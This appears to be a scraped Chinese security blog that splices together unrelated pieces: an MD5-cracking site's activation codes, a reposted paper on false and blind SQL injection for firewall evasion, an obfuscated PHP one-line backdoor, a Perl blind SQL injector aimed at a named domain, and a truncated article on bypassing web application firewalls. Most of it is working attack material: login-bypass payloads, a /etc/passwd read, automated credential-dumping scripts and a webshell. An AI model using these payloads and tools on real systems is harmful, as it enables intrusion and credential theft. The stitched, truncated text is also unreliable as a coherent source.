所以没必要注册多个帐号.

注册暂时开放了,访问 会员注册 页面会自动生成一个激活码.

该激活码内有一定数量的所谓”金币”.

该激活码可以用于新帐号注册,不能用于已有帐号充值.

如何获得可用于充值的激活码:

可通过以下方式的任何一种获取可用于充值的激活码(50-5000不等)

1. 在您的博客\空间等做上 md5 破解板块的 友情链接 ,并且截图发送到管理员邮箱

2.提交建议被采纳

3.提交bug被采纳

4.别的方法我没想好的

5.提交成功率髙的字典

6.也可以赞助本站获得激活码

以上方式请通过如下邮箱联系管理员 : root@0x50sec.org

为什么改成这样的?

节约资源,或者其他just for fun~~~

新增了md5(md5($pass))、md5(md5($pass).$salt) (discuz)等加密方式的破解。

小站资源有限决定对占用资源的部分进行会员制度。

会员注册需要使用邀请码。

先发放20个.

-::激活码                                                        -::金额

2ad454b95d23576cdf33a9f4337922f4     50

再放20个

-::激活码                                                        -::金额

f4cf60f1f153cd710234cd65586296fb     100
4170f1b65b74a7918808393a8656b586     100
38f29aa54cede433a1fb63a8c6f40155     100
5fac5f3e22162d24c56d24f5d34d4574     100
1fafa5d98086085949f87a4fdaf4e162     100
c215d6af0192225d7e1708f0c9d1be93     100
a355c4f9af46d5b79f09719a90637de2     100
1b8baf24d244328ef829ae142a1b15ae     100
05c18d05fc2d4c2040e451d4b3db4d38     100
af6947164fe453dbdcd681fed91e4150     100
89a4f54e31c81ea8f6246aed150bd4f1     100
1a5f3d314552341461bfb906ff10b520     100
9c49fe1f93b6e9bc4aca5a95d5547f53     100
5a5983e93af81f7d6edadbec35e08d6a     100
309ff64f2f208e1384de0208b83a34de     100
5976218171de77b9a4f2198a0fbe4665     100
86395fc102c3d625001ff88bba85647b     100
a2e08390a33f10e0c6f95d7c4ff9eef7     100
cf4d7b1d13da30e2fdeff40755aaaad5     100
ed6bf6d3c103ea4022730be2a4abc09c     100

http://www.exploit-db.com/papers/18263/

False SQL Injection and Advanced Blind SQL Injection

#########################################################################
#                                    #
# Exploit Title: False SQL injection and advanced blind SQL injection    #
# Date: 21/12/2011                            #
# Author: wh1ant                            #
# Company: trinitysoft                            #
# Group: secuholic                            #
#                                    #
#       ###                                       ##           #
#     ######                                    ######         #
#    ##    ##                                  ###   ##        #
#           ##                                ##               #
#            ###                            ###                #
#             ###                          ###                 #
#              ###   #                #   ###                  #
#                ############   ###########                    #
#               ############################                   #
#              ##############################                  #
#              #############################                   #
#             # ############################ #                 #
#              # ####   ############   #### #                  #
#               # #####  ##########  ##### #                   #
#                # ###################### ##                   #
#                ## #################### ##                    #
#                 ## ################## ##                     #
#                # ## ################ ## #                    #
#                 # ## ############## ## #                     #
#                 ## ## ############ ## ##                     #
#              ## ## ########## ## ##                      #
#                    # ## ######## ## #                        #
#                       ## ###### ##                           #
#                        ## #### ##                            #
#                         ## ## ##                             #
#                        ##      ##                            #
#                        ##      ##                            #
#                         ###  ###                   #
#                                    #
#########################################################################

This document is written for publicizing of new SQL injection method about detour some web firewall or some security solution. I did test on a web firewall made in Korean, most SQL injection attack was hit, I will not reveal the maker for cutting its damage.

In order to read this document, you have to understand basic MySQL principles. I classified the term “SQL Injection” as 2 meanings. The first is a general SQL Injection, we usually call this “True SQL Injection”, and the second is a “False SQL Injection”. Though in this documentation, you can know something special about “True SQL Injection”

And I mean to say it’s true that my method (False SQL Injection) is different from True/False SQL Injection mentioned in “Blind SQL Injection”. A tested environment was as follow.

ubuntu server    11.04
mysql        5.1.54-1
Apache        2.2.17
PHP        5.3.5-1

A tested code was as follow.

<?php

/*
create database injection_db;
use injection_db;
create table users(num int not null, id varchar(30) not null, password varchar(30) not null, primary key(num));

insert into users values(1, ‘admin’, ‘ad1234′);
insert into users values(2, ‘wh1ant’, ‘wh1234′);
insert into users values(3, ‘secuholic’, ‘se1234′);

*** login.php ***
*/

if(empty($_GET['id']) || empty($_GET['password'])){
echo “<html>”;
echo “<body>”;
echo “<form name=’text’ action=’login.php’ method=’get’>”;
echo “<h4>ID&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=’text’ name=’id’><br>”;
echo “PASS<input type=’password’ name=’password’><br></h4>”;
echo “<input type=’submit’ value=’Login’>”;
echo “</form>”;
echo “</body>”;
echo “</html>”;
}

else{
$id = $_GET['id'];
$password = $_GET['password'];

$dbhost = ‘localhost’;
$dbuser = ‘root’;
$dbpass = ‘pass’;
$database = ‘injection_db’;

$db = mysql_connect($dbhost, $dbuser, $dbpass);
mysql_select_db($database,$db);
$sql = mysql_query(“select * from users where id=’$id’ and password=’$password’”) or die (mysql_error());

$row = mysql_fetch_array($sql);

if($row[id] && $row[password]){
echo “<font color=#FF0000><h1>”.”Login sucess”.”</h1></u><br>”;
echo “<h3><font color=#000000>”.”Hello, “.”</u>”;
echo “<font color=#D2691E>”.$row[id].”</u></h3><br>”;
}
else{
echo “<script>alert(‘Login failed’);</script>”;
}
mysql_close($db);
}

?>

First, basic SQL Injection is as follow.
‘ or 1=1#

The code above is general SQL Injection Code, and this writer classified the code as “True SQL Injection”. When you log on to some site, in internal of web program, your id and password are identified by some statement used “select id, password from table where id=” and password=”, you can easily understand when you think 0 about character single quotation mark. Empty space is same as 0, the attack is possible using = and 0. As a result, following statement enables log on process.

‘=0#

We can apply it in a different way.

This is possible as 0>-1
‘>-1#

Also, this is possible as 0<1
‘<1#

You don’t have to use only single figures. You can use two figures attack as follow.
1′<99#

Comparison operation 0=1 will be 0, the following operation result is true because of id=”=0(0=1).

‘=0=1#

Additionally there is some possible comparison operation making the same value each other.

‘<=>0#

Like this, if you use the comparison operation, you can attack as additional manner.

‘=0=1=1=1=1=1#
‘=1<>1#
‘<>1#
1′<>99999#
‘!=2!=3!=4#

In this time, you get the turn on understanding False SQL injection. the following is not attack but operation for MySQL.

mysql> select * from users;
+—–+———–+———-+
| num | id        | password |
+—–+———–+———-+
|   1 | admin     | ad1234   |
|   2 | wh1ant    | wh1234   |
|   3 | secuholic | se1234   |
+—–+———–+———-+
3 rows in set (0.01 sec)

This shows the contents in any table without any problem.
The following is the content when you don’t input any value in the id

mysql> select * from users where id=”;
Empty set (0.00 sec)

Of course there is not result because id field dosen’t have any string.
In the truth, I have seen the case that in the MySQL if string field has a 0, the result is true. Based on the truth, following statement is true.

mysql> select * from users where id=0;
+—–+———–+———-+
| num | id        | password |
+—–+———–+———-+
|   1 | admin     | ad1234   |
|   2 | wh1ant    | wh1234   |
|   3 | secuholic | se1234   |
+—–+———–+———-+
3 rows in set (0.00 sec)

If you input 0 in id, All the content is showed. This is the basic about “False SQL Injection”. After all, result of 0 makes log on process success. For making the result 0, you need something processing integer, in that time you can use bitwise  operations and arithmetic operations.

Once I’ll show bitwise operation example.

Or bitwise operation is well known for any programmer. And as I told you before, ” is 0, if you operate “0 bitwise OR 0″, the result is 0. So the following operation succeed log on as the False SQL Injection.
‘|0#

Naturally, you can use AND operation.
‘&0#

This is the attack using XOR
‘^0#

Also using shift operation is enable.
‘<<0#
‘>>0#

If you apply like those bitwise operations, you can use variable attack methods.
‘&”#
‘%11&1#
‘&1&1#
‘|0&1#
‘<<0|0#
‘<<0>>0#

In this time, I will show “False SQL Injection” using arithmetic operations.
If the result is 0 using arithmetic operation with ”, attack will be success. The following is the example using arithmetic operation.

‘*9#
Multiplication

‘/9#
Division.

‘%9#
Mod

‘+0#
Addition

‘-0#
Subtraction

Significant point is that the result has to be under one. Also you can attack as follow.
‘+2+5-7#
‘+0+0-0#
‘-0-0-0-0-0#
‘*9*8*7*6*5#
‘/2/3/4#
‘%12%34%56%78#
‘/**/+/**/0#
‘—–0#
‘+++0+++++0*0#

Next attack is it using fucntion. In this document, I can’t show all the functions. Because this attack is not difficult, you can use the “True, False SQL Injection” attack with function as much as you want. And whether this attack is “True SQL Injection” or “False SQL Injection” is decided on the last operation after return of function.
‘<hex(1)#
‘=left(0×30,1)#
‘=right(0,1)#
‘!=curdate()#
‘-reverse(0)#
‘=ltrim(0)#
‘<abs(1)#
‘*round(1,1)#
‘&left(0,0)#
‘*round(0,1)*round(0,1)#

Also, you can use attack using space in function name. But you are able to use the space with only some function.
‘=upper     (0)#

In this time, SQL keyword is method. This method is also decided as True or False Injection according to case.
‘ <1 and 1#
‘xor 1#
‘div 1#
‘is not null#
admin’ order by’
admin’ group by’
‘like 0#
‘between 1 and 1#
‘regexp 1#

Inputting id or password in the field without annotaion is possible about True, False SQL Injection. Normal Web Firewalls filter #, –, /**/, so the method is more effective in the Web Firewalls.
ID  : ‘=’
PASS: ‘=’

ID  : ‘<>’1
PASS: ‘<>’1

ID  : ‘>1=’
PASS: ‘>1=’

ID  : 0′=’0
PASS: 0′=’0

ID  : ‘<1 and 1>’
PASS: ‘<1 and 1>’

ID  : ‘<>ifnull(1,2)=’1
PASS: ‘<>ifnull(1,2)=’1

ID  : ‘=round(0,1)=’1
PASS: ‘=round(0,1)=’1

ID  : ‘*0*’
PASS: ‘*0*’

ID  : ‘+’
PASS: ‘+’

ID  : ‘-’
PASS: ‘-’

ID  :’+1-1-’
PASS:’+1-1-’

All attacks used in the documentation will be more effective with using bracket when detouring web firewall.
‘+(0-0)#
‘=0<>((reverse(1))-(reverse(1)))#
‘<(8*7)*(6*5)*(4*3)#
‘&(1+1)-2#
‘>(0-100)#

Let’s see normal SQL Injection attack.
‘ or 1=1#

If this is translated in hexdemical, the result is as follow.

http://127.0.0.1/login.php?id=%27%20%6f%72%20%31%3d%31%23&password=1234

Like attack above is basically filtered. So that’s not good attack, I will try detour filtering using tab(%09) standing in for space(%20). In truth, you can use %a0 on behalf of %09.

The possible values are as follow.
%09
%0a
%0b
%0c
%0d
%a0
%23%0a
%23%48%65%6c%6c%6f%20%77%6f%6c%72%64%0a

The following is the example using %a0 instead of %20.

http://127.0.0.1/login.php?id=%27%a0%6f%72%a0%31%3d%31%23&password=1234

In this time, I will show “Blind SQL injection” attack, this attack can’t detour web firewall filtering, but some attacker tend to think that Blind SQL Injection attack is impossible to log on page. So I decided showing this subject.

The following attack code can be used on log on page. And the page will show id and password.
‘union select 1,group_concat(password),3 from users#

This attack code brings /etc/password information.
‘union select 1,load_file(0x2f6574632f706173737764),3 from users#

Dare I say it without union select statement using Blind SQL injection with and operation is possible.

The result of record are three.
admin’ and (select count(*) from users)=3#

Let’s attack detouring web firewall using Blind SQL Injection. The following is vulnerable code to Blind SQL Injection.

<?php

/*** info.php ***/

$n = $_GET['num'];
if(empty($n)){
$n = 1;
}

$dbhost = ‘localhost’;
$dbuser = ‘root’;
$dbpass = ‘root’;
$database = ‘injection_db’;

$db = mysql_connect($host, $dbuser, $dbpass);
mysql_select_db($database,$db);
$sql = mysql_query(“select * from `users` where num=”.$n) or die (mysql_error());
$info = @mysql_fetch_row($sql);
echo “<body bgcolor=#000000>”;
echo “<h1><font color=#FFFFFF>wh1ant</font>”;
echo “<font color=#2BF70E> site for blind SQL injection test</h1><br>”;
echo “<h1><font color=#2BF70E>num: </font><font color=#D2691E>”.$info[0].”</font></h1>”;
echo “<h1><font color=#2BF70E>user: </font><font color=#D2691E>”.$info[1].”</font>”;
echo “<body>”;
mysql_close($db);

?>

Basic Blind SQL Injection is as follow on like above.

http://127.0.0.1/info.php?num=1 and 1=0
http://127.0.0.1/info.php?num=1 and 1=1

But using = operation is possible for Blind SQL Injection.

http://192.168.137.129/info.php?num=1=0

http://192.168.137.129/info.php?num=1=1

Also other operation is possible naturally.

http://127.0.0.1/info.php?num=1<>0

http://127.0.0.1/info.php?num=1<>1

http://127.0.0.1/info.php?num=1<0

http://127.0.0.1/info.php?num=1<1

http://127.0.0.1/info.php?num=1*0*0*1

http://127.0.0.1/info.php?num=1*0*0*0

http://127.0.0.1/info.php?num=1%1%1%0

http://127.0.0.1/info.php?num=1%1%1%1

http://127.0.0.1/info.php?num=1 div 0
http://127.0.0.1/info.php?num=1 div 1

http://127.0.0.1/info.php?num=1 regexp 0
http://127.0.0.1/info.php?num=1 regexp 1

http://127.0.0.1/info.php?num=1^0

http://127.0.0.1/info.php?num=1^1

Attack example:
http://127.0.0.1/info.php?num=0^(locate(0×61,(select id from users where num=1),1)=1)
http://127.0.0.1/info.php?num=0^(select position(0×61 in (select id from users where num=1))=1)
http://127.0.0.1/info.php?num=0^(reverse(reverse((select id from users where num=1)))=0x61646d696e)
http://127.0.0.1/info.php?num=0^(lcase((select id from users where num=1))=0x61646d696e)
http://127.0.0.1/info.php?num=0^((select id from users where num=1)=0x61646d696e)
http://127.0.0.1/info.php?num=0^(id regexp 0x61646d696e)

http://127.0.0.1/info.php?num=0^(id=0x61646d696e)

http://127.0.0.1/info.php?num=0^((select octet_length(id) from users where num=1)=5)
http://127.0.0.1/info.php?num=0^((select character_length(id) from users where num=1)=5)

If I will show all attack, I have to take much time, So I stopped in this time. Blind SQL Injection is difficult manually, So using tool will be more effective. I will show a tool made python, this is an example using ^(XOR) bitwise operation. In order to make the most of detouring the web firewall, I replaced space with %0a.

#!/usr/bin/python

### blind.py ###

import urllib
import sys
import os

def put_data(true_url, true_result, field, index, length):
for i in range(1, length+1):
for j in range(32, 127):
attack_url = true_url + “^(%%a0locate%%a0%%a0(0x%x,(%%a0select%%a0%s%%a0%%a0from%%a0%%a0users%%a0where%%a0num=%d),%d)=%d)” % (j,field,index,i,i)
attack_open = urllib.urlopen(attack_url)
attack_result = attack_open.read()
attack_open.close()

if attack_result==true_result:
ch = “%c” % j
sys.stdout.write(ch)
break
print “\t\t”,

def get_length(false_url, false_result, field, index):
i=0
while 1:
data_length_url = false_url + “^(%%a0(select%%a0octet_length%%a0%%a0(%s)%%a0from%%a0users%%a0where%%a0num%%a0=%%a0%d)%%a0=%%a0%d)” % (field,index,i)
data_length_open = urllib.urlopen(data_length_url)
data_length_result = data_length_open.read()
data_length_open.close()
if data_length_result==false_result:
return i
i+=1

url = “http://127.0.0.1/info.php”

true_url = url + “?num=1″
true_open = urllib.urlopen(true_url)
true_result = true_open.read()
true_open.close()

false_url = url + “?num=0″
false_open = urllib.urlopen(false_url)
false_result = false_open.read()
false_open.close()

print “num\t\tid\t\tpassword”
fields = “num”, “id”, “password”

for i in range(1, 4):
for j in range(0, 3):
length = get_length(false_url, false_result, fields[j], i)
length = put_data(false_url, true_result, fields[j], i, length)
print “”

To its regret, the attack test is stopped for no time, if anyone not this writer studies some attack codes additionally, it will be easy for him to develop the attack.

# Korean document: http://wh1ant.kr/archives/[Hangul]%20False%20SQL%20injection%20and%20Advanced%20blind%20SQL%20injection.txt

[EOF]

网上找了半天都没找到～～～，有同样想装gtalk的不妨下载安装试试。

下载地址: Talk

<?php
$_=”";
$_[+""]=”;
$_=”$_”.”";
$_=($_[+""]|””).($_[+""]|””).($_[+""]^””);
?>
<?php ${‘_’.$_}['_'](${‘_’.$_}['__']);?>

经过测试发现原来一个数组跟一个字符串连接后会强制把数组转换为字符串”Array”，所以也就有了上面那个一句话后门。
解密一下其实就是这个样子。

<?php
$_=”";            //$_空字符串
$_[+""]=”;        //$_[0]为空字符串
$_=”$_”.”";        //数组跟空字符串连接后(经php强制转换)    变成了字符串”Array” 所以$_[+""]相当于$_[0]=’A’
$_=($_[+""]^””).($_[+""]^””).($_[+""]^””).($_[+""]^””);    //POST
//$_=($_[+""]|””).($_[+""]|””).($_[+""]^””);                    //GET
@${‘_’.$_}['_'](${‘_’.$_}['__']);                                    //$_POST[_]($_POST[__])
?>

#!/usr/bin/perl
# blind access sqlinjector [GET Method]
# for educational purpose only!
# Code by c4rp3nt3r@0x50sec.org
#其实没多大作用

use POSIX;
use LWP::UserAgent;

#######!!!!!!SET THE FOLLOWING TWO LINES
$target ="http://www.cli5.com/exploit.asp?id=111";
$turestr='2011-1-1';
#######!!!!!!

$comstr="";		#%00
$nullstr="+";	#%20 %09 %0a 

print "\n";
print "\t|=-----------------------------------------=|\n";
print "\t|=---[ Blind Access SQL Injector V1.0 ]----=|\n";
print "\t|=-------[ c4rp3nt3r\@0x50sec.org ]---------=|\n";
print "\t|=-----------------------------------------=|\n\n";

main();

sub main
{

	print 'Choose a number to be execute:
	[a] fuzz table_name
	[b] fuzz column_name
	[c] sql (Dump data)
	';
	print "\n";
	print "Choose a number#";
	$xnum= ; chomp $xnum;

	if($xnum eq 'a')
	{
		fuzz_tb();
	}elsif($xnum eq 'b')
	{
		print "Enter The table name to fuzz the column#";
		$sql_stdin= ; chomp $sql_stdin;
		fuzz_pwd_usr_clm($sql_stdin);
	}elsif($xnum eq 'c')
	{
		print "Enter The admin table name#";
		$t_admin = ; chomp $t_admin;
		print "Enter the user column name#";
		$t_user = ; chomp $t_user;
		print "Enter the pass column name#";
		$t_pass = ; chomp $t_pass;
		dump_fuzz_half($t_admin,$t_user,$t_pass);
	}

}

#################
sub fuzz_tb
{
print "[*] Fuzz admin table name...\n";
$xsql = $nullstr.'aND(SeLEcT'.$nullstr.'CoUNt(*)'.$nullstr.'fRoM';#.think_md5hash)>0--

#print "$sql\n\007\n";
@ok_tbname=();
$long=@ok_tbname;

#print "[*] Guess table name...\n\n";
@tables=(
'admin',
'admins',
'users',
'user',
'usr_pw',
'salt',
'members',
'mysql.user',
'think_md5hash',
'hash',
'login',
'log_user',
'admin_user',
'adminuser',
'member_admin',
'AdminUsers',
'administrables',
'administrateur',
'administrateurs',
'login_admin',
'login_admins',
'login_user',
'login_users',
'lost_pass',
'lost_passwords',
'lostpass',
'lostpasswords',
'stnuser',
'stuser',
'stusers',
'stuseres',
'staff',
'u_name',
'u_p',
'u_pass',
'Benutzer',
'usercontrol',
'user_pw',
'Benutzerliste',
'userlogins',
'userpasswd',
'admuser',
'system',
'adm',
'tb_user',
'x_admin',
'm_admin',
'manage',
'member',
'tbl_user',
'tbl_users',
'tbl_admin',
'tbl_admins',
'tbl_member',
'tbl_members',
'tbladmins',
'admin_user',
'admin_userinfo',
'administrator',
'adminid',
'admin_id',
'adminuserid',
'admin_userid',
'AdminUID',
'adminusername',
'admin_username',
'adminname',
'admin_name',
'wp_users',
);
	foreach $tbname(@tables)
	{
		$final=$target.$xsql.$nullstr.$tb_prefix.$tbname.')'.$comstr;
		$ua =  new LWP::UserAgent or die;
		$ua->timeout(35);
		$ua->proxy("http", "http://$proxy/") if defined($proxy);
		$tbres = $ua->get($final);
		print "[*] Fuzz table name [$tbname]"."\n";
		#print $final."\n";
		if($tbres->content =~ /$turestr/)
		{
			$result=$result."[+] Found ->".$tbname."\n\n";
			print " \n[+] Found table_name-> [$tbname]"."\n\n";
			$long=@ok_tbname;
			@ok_tbname[$long]=$tbname;	#将存在的表名放到一个数组里
		}
	}

}

sub fuzz_pwd_usr_clm
{
my($xok_tbname)=@_;

##-------
@usrclms=(
'username',
'user_name',
'user',
'login',
'admin',
'adminname',
'admin_id',
'usr',
'name',
'u_name',
'administrators',
'administrator',
'adminuser',
'adminname',
'admin_name',
'admin_user',
'admin_username',
'user_admin',
'user_n',
'user_un',
'user_uname',
'user_username',
'user_usernm',
'user_usernun',
'user_usrnm',
'usr',
'email',
'mail',
'usr_n',
'usr_name',
'usr_pass',
'usr2',
'usrn',
'usrnam',
'usrname',
'usrnm',
'adminusername',
'bbsuser',
'bbsid',
'bbsusername',
'permission',
'access',
'accnt',
'accnts',
'account',
'accounts',
'qq',
'帐号',
'管理员',
'权限',
'用户名',
'会员',
'用户帐号',
);
@pwdclms=(
'password',
'pwd',
'userpass',
'pass',
'psw',
'userpwd',
'userpw',
'psd',
'pw',
'user_pass',
'admin_password',
'PassWD',
'user_password',
'uPassword',
'user_pwd',
'adminpwd',
'admin_pass',
'admin_password',
'login_pass',
'login_passwd',
'login_password',
'login_pw',
'login_pwd',
'login_user',
'login_username',
'adminpsw',
'adminupass',
'user_pass',
'user_passw',
'user_passwd',
'user_pw',
'user_pwd',
'user_pword',
'pword',
'user_pwrd',
'密码',
'用户密码',
'编号',
);

	print "\n[*] Fuzz user column name...\n\n";
	my $ua = new LWP::UserAgent or die;
	$i=0;
	$ua -> agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920	Firefox/3.0.4");
	foreach $usr_clm(@usrclms)
	{

		$xsql = $nullstr.'aND(SeLEcT'.$nullstr.'CoUNt('.$usr_clm.')'.$nullstr.'fRoM'.$nullstr.$xok_tbname.')'.$comstr;#.think_md5hash)>0--
		$final=$target.$xsql;
		$tbres = $ua->get($final);
		print "[*] Fuzz [$usr_clm] from $xok_tbname \n";
		#print $final."\n";
		if($tbres->content =~ /$turestr/)
		{	$result=$result."[+] Found column_name->"."[$usr_clm]"." from table_name->"."[$xok_tbname]"."\n";
			print "\n[+] Found column_name->"."[$usr_clm]"." from table_name->"."[$xok_tbname]"."\n\n";
			$usr=$usr_clm;
			last;
		}
	}

	print "\n[*] Fuzz password column name...\n\n";
	foreach $pwd_clm(@pwdclms)
	{
		$xsql = $nullstr.'aND(SeLEcT'.$nullstr.'CoUNt('.$pwd_clm.')'.$nullstr.'fRoM'.$nullstr.$xok_tbname.')'.$comstr;#.think_md5hash)>0--
		$final=$target.$xsql;

		$tbres = $ua->get($final);
		print "[*] Fuzz [$pwd_clm] from [$xok_tbname] \n";
		#print $final."\n";
		if($tbres->content =~ /$turestr/)
		{	$result=$result."[+] Found column_name->"."[$pwd_clm]"." from table_name->"."[$xok_tbname]"."\n";
			print "\n[+] Found column_name->"."[$pwd_clm]"." from table_name->"."[$xok_tbname]"."\n\n";
			$pwd=$pwd_clm;
			last;
		}
	}

	print "[+] Found column_name->"." [$usr] [$pwd] "." from table_name->"."[$xok_tbname]"."\n\n";
}

#################################
sub dump_fuzz_half
{
	$|=1;	# 立即刷新缓冲区输出内容
	my($xok_tbname,$usr,$pwd) = @_; 

	$fuzzsql="seleCt".$nullstr."count(*)".$nullstr.'from'.$nullstr.$xok_tbname;
	print "[*]$fuzzsql:\n";
	$count = fuzz_half($fuzzsql,0,45);
	if($count<=0)
	{
		print "[-]Count(*) of $xok_tbname is less than zero!\n";
		exit;
	}else
	{
		print "[+]Count(*) of $xok_tbname is: [$count]\n";
	}

	$fuzzsql="seleCt".$nullstr.'top'.$nullstr.'1'.$nullstr."len($usr)".$nullstr.'from'.$nullstr.$xok_tbname;
	print "[*]$fuzzsql:\n";
	$len = fuzz_half($fuzzsql,0,45);
	if($len<=0)
	{
		print "[-]Length of top 1 $usr is less than zero!\n";
		exit;
	}else
	{
		print "[+]Length of top 1 $usr is: [$len]\n";
	}
	@okusr=();
	@okpwd=();
	printf("[+]SeleCt top 1 [$usr] from [$xok_tbname]: ");
	for($subset=1;$subset<=$len;$subset++)
	{
		$fuzzsql='seleCt'.$nullstr.'top'.$nullstr.'1'.$nullstr."asc(mid($usr,$subset,1))".$nullstr.'frOm'.$nullstr.$xok_tbname;
		$long=@okusr;
		$ret=fuzz_half($fuzzsql,0,127);
		@okusr[$long]=$ret;
		printf("%c",$ret);
	}
	print "\n[";
	foreach $xoktbnum(@okusr)
	{
		printf("%c",$xoktbnum);
	}
	print "]\n";

	$fuzzsql='seleCt'.$nullstr.'top'.$nullstr.'1'.$nullstr."len($pwd)".$nullstr.'from'.$nullstr.$xok_tbname;
	print "[*]$fuzzsql:\n";
	$len = fuzz_half($fuzzsql,0,45);
	if($len<=0)
	{
		print "[-]Length of top 1 $pwd is less than zero!\n";
		exit;
	}else
	{
		print "[+]Length of top 1 $pwd is: [$len]\n";
	}
	printf("[+]SeleCt top 1 [$pwd] from [$xok_tbname]: ");
	for($subset=1;$subset<=$len;$subset++)
	{
		$fuzzsql='seleCt'.$nullstr.'top'.$nullstr.'1'.$nullstr."asc(mid($pwd,$subset,1))".$nullstr.'frOm'.$nullstr.$xok_tbname;
		$long=@okpwd;
		$ret=fuzz_half($fuzzsql,0,127);
		@okpwd[$long]=$ret;
		printf("%c",$ret);
	}
	print "\n[";

	foreach $xoktbnum(@okpwd)
	{
		printf("%c",$xoktbnum);
	}
	print "]\n\n";
	$fuzzsql="seleCt".$nullstr.'top'.$nullstr.'1'.$nullstr."$usr,$pwd".$nullstr.'from'.$nullstr.$xok_tbname;
	printf "[+]$fuzzsql:\n";
	print "[$usr] : ";
	foreach $xoktbnum(@okusr)
	{
		printf("%c",$xoktbnum);
	}
	print "\n";
	print "[$pwd] : ";
	foreach $xoktbnum(@okpwd)
	{
		printf("%c",$xoktbnum);
	}
	print "\n\n";

}

##################################
sub fuzz_half	#order by语句递归查询函数采用折半法
{
    #($min,$max)区间代表一个范围，正确的字段数在其中我们折半缩小之直到找到正确字段数
    #$min 代表能够正常显示的已经确定的最小整数
    #$max 代表不能够正常显示的已经确定的最小整数，作为我们可以确定的范围的最大数所以叫其"max"
    my ($sql,$min,$max) = @_;
    $x_fuzzsql=$sql;
    if($max==0&&$min==0)
    {
		return 0;
    }
    if($max-$min==1)#如果能正常显示的最小整数比不能正常显示的最小整数大一那么最小的数$min
    {				#就是要找的正确字段数目退出递归函数返回之
    	return $max;
    }
	#如果上面条件没成立就取范围中间的数字作为order by查询字段数
	my $mid=int(($min+$max)/2);#取两个正整数的平均值
	#print "max:$max,min:$min,mid=$mid\n";
	$final=$nullstr."AnD"."($sql)>";
	$final = $target.$final.$mid.$comstr;
	#print "[*] Test ($sql)>$mid...\n";
	#print $final."\n";
	my $lwp = new LWP::UserAgent or die;
	$lwp -> agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4");
	my $res = $lwp->get($final);
	my $myres=$res->content; #for test
	if($res->content =~ /$turestr/)
	{
		$min=$mid;
		fuzz_half($sql,$min,$max);
	}
	else
	{
		$max=$mid;
		fuzz_half($sql,$min,$max);
	}
}

0×00 前言

08年初诞生了一种SQL群注攻击，黑客在全球范围内对asp，asp.net加MSSQL架构的网站进行了疯狂扫荡。由于MSSQL支持多语句注入，黑客通过一条结合游标的SQL语句就能将整个数据库的字段内容自动进行篡改，可以在网站上无差别的进行网页木马攻击。

互联网是快速更新迭代的，但是很多没有开发能力的单位都是通过外包建立网站，网站的程序一上线就再也无人维护，很多程序存在各种漏洞无法修补，于是 WAF便有了市场，现今门槛低且最能解决问题的是针对IIS/apache的软件WAF，通常一个模块一个扩展就能搞定，当然也有耗资百万千万的硬件 WAF，然而如果WAF拦截规则出现漏洞，这百万千万的硬件也就是一堆废铁。那么WAF是否真的可以解决所有的WEB安全问题呢？所以本文主要解析一些可以绕过WAF的罕见漏洞，供安全人员参考。

0×01 Request对象的包解析漏洞.

asp和asp.net的Request对象存在一个包解析漏洞，Request对象对于GET和POST包的解析过于宽松，用一句话表达就是 Request对象它GET和POST傻傻分不清楚，稍有点web开发经验的同学应该知道Request接收GET,POST,COOKIE也就是GPC 传过来的数据，但是asp和.net库内置的Request对象完全不按RFC标准来，下面我们可以做个测试：

分别将下面两段代码保存为1.asp和1.aspx

使用asp的Request对象接收t参数传值
———————————————–
＜%
Response.Write “Request:” & Request(“t”)
%＞
———————————————–

使用asp.net的Request对象接收t参数传值
———————————————–
＜%@ Page Language=”C#” %＞
＜%
string test = Request["t"];
Response.Write(“Request:”+test);
%＞
———————————————–

使用下面的python脚本调用socket发送原始的HTTP包
———————————————–
#!/usr/bin/env python

import socket

host = ’192.168.239.129′
path = ‘/1.asp’
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)

exploit_packet=”t=’/**/or/**/1=1–”
exploit_packet+=”\r\n” * 8
packet_length = len(exploit_packet)
packet=’GET ‘ + path + ‘ HTTP/1.1\r\n’
packet+=’Host: ‘ + host + ‘\r\n’
packet+=’Content-Length: %s\r\n’ % packet_length
packet+=’Content-Type: application/x-www-form-urlencoded\r\n’
packet+=’\r\n’
packet = packet + exploit_packet

print packet
s.send(packet)
buf = s.recv(1000)
if buf: print buf[buf.rfind("\r\n"):]
s.close()
———————————————–

我们发送的原始包是：
GET /1.asp HTTP/1.1
Host: 192.168.239.129
Content-Length: 34
Content-Type: application/x-www-form-urlencoded

t=’/**/or/**/1=1–

结果返回如下：
Request:’/**/or/**/1=1–
将python测试脚本的path改为/1.aspx测试页返回同样结果。

我们可以看到这是一个畸形的HTTP GET请求包，这个包的奥秘在于t=’/**/or/**/1=1–参数后的8个回车换行和Content-Length头，包的结构类似于一个POST 包，而请求的方法是GET,最后asp和asp.net的Request对象成功的解析了这个畸形包取出了数据。

所以如果WAF没有处理好HTTP包的内容，沿用常规思路处理GET和POST的逻辑的话，那么这个畸形包将会毁掉WAF的基础防御。

0×02 被遗忘的复参攻击.

大家应该还记得09年的HTTP Parameter Pollution攻击，查看[3]文档，可以发现ASP/IIS和ASP.NET/IIS的场景下存在一个复参特性，本文将利用这种的特性的攻击简称为复参攻击，用0X01里的例子简单的测试一下:

用GET请求传入两个t参数
GET http://192.168.239.129/1.asp?t=1&t=2
将返回
Request:1, 2

asp和asp.net的Request对象接收了两个参数，并且以逗号分隔，所以便衍生出了[3]文档中的复参SQL注入方法：

Vulnerable code：
SQL=”select key from table where id=”+Request.QueryString(“id”)

This request is successfully performed using the HPP technique：
/?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users

The SQL request becomes：
select key from table where id=1/**/union/*,*/select/*,*/pwd/*,*/from/*,*/usersLavakumarKuppan,

我们可以看到通过巧妙的运用注释符结合复参特性可以分割GET参数中的SQL注入语句，如果WAF对GET参数的处理过于简单是不是会匹配不到拦截规则呢?

0×03 高级复参攻击.

ASP.NET的Request对象有一个Params属性，ASP.NET程序员在一些程序中会使用Request.Params["xxx"] 传入数据，参考[4]微软MSDN文档我们可以知道Params属性的特性，该属性接收GET,POST和Cookie的传值集合，这里我们可以修改 0×01里的例子测试一下：

使用asp.net的Request.Params方法接收t参数传值
———————————————–
＜%@ Page Language=”C#” %＞
＜%
string test = Request.Params["t"];
Response.Write(“Request:”+test);
%＞
